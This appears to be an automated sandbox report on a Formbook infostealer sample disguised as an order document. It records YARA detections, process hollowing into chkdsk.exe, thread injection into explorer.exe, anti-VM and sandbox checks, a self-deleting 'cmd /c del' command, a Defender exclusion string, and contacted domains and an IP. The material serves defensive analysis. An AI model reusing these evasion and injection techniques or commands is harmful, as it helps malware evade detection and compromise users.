          Source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.714080485.000000000DA3A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.752920867.00000000019E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.932067660.0000000004D60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.682235921.00000000035C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 0_2_002266FF0_2_002266FF
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 0_2_002243510_2_00224351
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 0_2_06AF00400_2_06AF0040
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041D97A3_2_0041D97A
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041EC8A3_2_0041EC8A
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041DCAE3_2_0041DCAE
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00409E5B3_2_00409E5B
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00409E603_2_00409E60
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041E6903_2_0041E690
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00FC43513_2_00FC4351
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00FC66FF3_2_00FC66FF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7EC8A9_2_04D7EC8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D62D909_2_04D62D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7E6909_2_04D7E690
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D69E5B9_2_04D69E5B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D69E609_2_04D69E60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D62FB09_2_04D62FB0
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041A360 NtCreateFile,3_2_0041A360
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041A410 NtReadFile,3_2_0041A410
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041A490 NtClose,3_2_0041A490
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041A540 NtAllocateVirtualMemory,3_2_0041A540
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041A35A NtCreateFile,3_2_0041A35A
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041A40A NtReadFile,3_2_0041A40A
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041A48A NtClose,3_2_0041A48A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7A490 NtClose,9_2_04D7A490
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7A410 NtReadFile,9_2_04D7A410
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7A540 NtAllocateVirtualMemory,9_2_04D7A540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7A360 NtCreateFile,9_2_04D7A360
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7A48A NtClose,9_2_04D7A48A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7A40A NtReadFile,9_2_04D7A40A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7A35A NtCreateFile,9_2_04D7A35A
          Source: document de commande.exeBinary or memory string: OriginalFilename vs document de commande.exe
          Source: document de commande.exe, 00000000.00000002.686561299.0000000007340000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs document de commande.exe
          Source: document de commande.exeBinary or memory string: OriginalFilename vs document de commande.exe
          Source: document de commande.exe, 00000003.00000002.753270968.0000000001B3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs document de commande.exe
          Source: document de commande.exe, 00000003.00000002.753001435.0000000001A16000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs document de commande.exe
          Source: document de commande.exeBinary or memory string: OriginalFilenameTimeZo.exe4 vs document de commande.exe
          Source: document de commande.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: document de commande.exeVirustotal: Detection: 31%
          Source: document de commande.exeMetadefender: Detection: 22%
          Source: document de commande.exeReversingLabs: Detection: 50%
          Source: document de commande.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\document de commande.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\document de commande.exe 'C:\Users\user\Desktop\document de commande.exe'
          Source: C:\Users\user\Desktop\document de commande.exeProcess created: C:\Users\user\Desktop\document de commande.exe C:\Users\user\Desktop\document de commande.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\document de commande.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\document de commande.exeProcess created: C:\Users\user\Desktop\document de commande.exe C:\Users\user\Desktop\document de commande.exeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\document de commande.exe'Jump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\document de commande.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@3/1
          Source: C:\Users\user\Desktop\document de commande.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: document de commande.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: document de commande.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: chkdsk.pdbGCTL source: document de commande.exe, 00000003.00000002.752978247.0000000001A10000.00000040.00020000.sdmp
          Source: Binary string: chkdsk.pdb source: document de commande.exe, 00000003.00000002.752978247.0000000001A10000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: document de commande.exe, 00000003.00000002.753021342.0000000001A20000.00000040.00000001.sdmp, chkdsk.exe, 00000009.00000002.932346690.00000000051DF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: document de commande.exe, 00000003.00000002.753021342.0000000001A20000.00000040.00000001.sdmp, chkdsk.exe, 00000009.00000002.932346690.00000000051DF000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: document de commande.exe, WinMixer/frmMain.cs.Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.document de commande.exe.220000.0.unpack, WinMixer/frmMain.cs.Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.document de commande.exe.220000.0.unpack, WinMixer/frmMain.cs.Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.document de commande.exe.fc0000.1.unpack, WinMixer/frmMain.cs.Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.document de commande.exe.fc0000.0.unpack, WinMixer/frmMain.cs.Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 0_2_002264B9 push es; ret 0_2_0022659A
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 0_2_06AF342D push dword ptr [edx+ebp*2-75h]; iretd 0_2_06AF3437
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_004168AF push A8DF1C14h; ret 3_2_004168B7
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_004171D2 push edi; iretd 3_2_004171E0
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_004079FD pushfd ; ret 3_2_00407A03
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00417A5D push cs; ret 3_2_00417A5E
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041EA34 push 0F02B573h; ret 3_2_0041EA58
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041D56C push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041D502 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0041D50B push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0040961A push ecx; ret 3_2_0040961B
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00405F1A pushad ; iretd 3_2_00405F1B
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00FC6512 push es; ret 3_2_00FC659A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7D4B5 push eax; ret 9_2_04D7D508
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7D56C push eax; ret 9_2_04D7D572
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7D502 push eax; ret 9_2_04D7D508
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7D50B push eax; ret 9_2_04D7D572
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D6961A push ecx; ret 9_2_04D6961B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D65F1A pushad ; iretd 9_2_04D65F1B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D768AF push A8DF1C14h; ret 9_2_04D768B7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D771D2 push edi; iretd 9_2_04D771E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D679FD pushfd ; ret 9_2_04D67A03
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D77A5D push cs; ret 9_2_04D77A5E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_04D7EA34 push 0F02B573h; ret 9_2_04D7EA58
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85154838784

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xED
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: /c del 'C:\Users\user\Desktop\document de commande.exe'
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: /c del 'C:\Users\user\Desktop\document de commande.exe'Jump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.document de commande.exe.25e46d8.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.document de commande.exe.2610300.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: document de commande.exe PID: 3116, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\document de commande.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\document de commande.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004D69904 second address: 0000000004D6990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004D69B7E second address: 0000000004D69B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\document de commande.exe TID: 6600Thread sleep time: -42551s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exe TID: 4100Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6620Thread sleep time: -52000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 6000Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\document de commande.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeThread delayed: delay time: 42551Jump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.711483629.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.707678093.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.711483629.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.730364449.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000004.00000000.723247499.0000000004755000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.730364449.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.730460849.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: document de commande.exe, 00000000.00000002.681705664.00000000025C1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\document de commande.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeCode function: 3_2_0040ACF0 LdrLoadDll,3_2_0040ACF0
          Source: C:\Users\user\Desktop\document de commande.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.ecshopdemo.com
          Source: C:\Windows\explorer.exeDomain query: www.gaiaseyephotography.com
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.186 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.casaruralesgranada.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\document de commande.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: F0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\document de commande.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\document de commande.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\document de commande.exeThread register set: target process: 3424Jump to behavior
